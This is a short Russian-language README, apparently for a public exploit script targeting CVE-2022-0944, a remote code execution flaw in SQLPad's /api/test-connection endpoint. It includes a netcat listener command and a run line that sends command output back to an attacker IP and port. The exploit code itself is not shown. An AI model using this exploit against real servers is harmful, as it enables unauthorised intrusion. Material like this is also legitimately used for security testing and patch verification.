
Эксплойт-скрипт для CVE-2022-0944, позволяющий выполнить удаленный код на SQLPad через эндпоинт /api/test-connection. Поддерживает слепое выполнение кода (blind RCE) с прослушивателем netcat для вывода команд.
Этот репозиторий содержит скрипт эксплуатации для CVE-2022-0944 в SQLPad — уязвимости, позволяющей удалённое выполнение кода (RCE) через конечную точку /api/test-connection.
Предоставленный скрипт (exploit.py) демонстрирует, как использовать уязвимость RCE в SQLPad. Скрипт отправляет полезную нагрузку на уязвимую конечную точку, выполняя команду на целевом сервере.
requests (можно установить через pip)nc -lvnp 4444
Запустите эксплуатацию
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>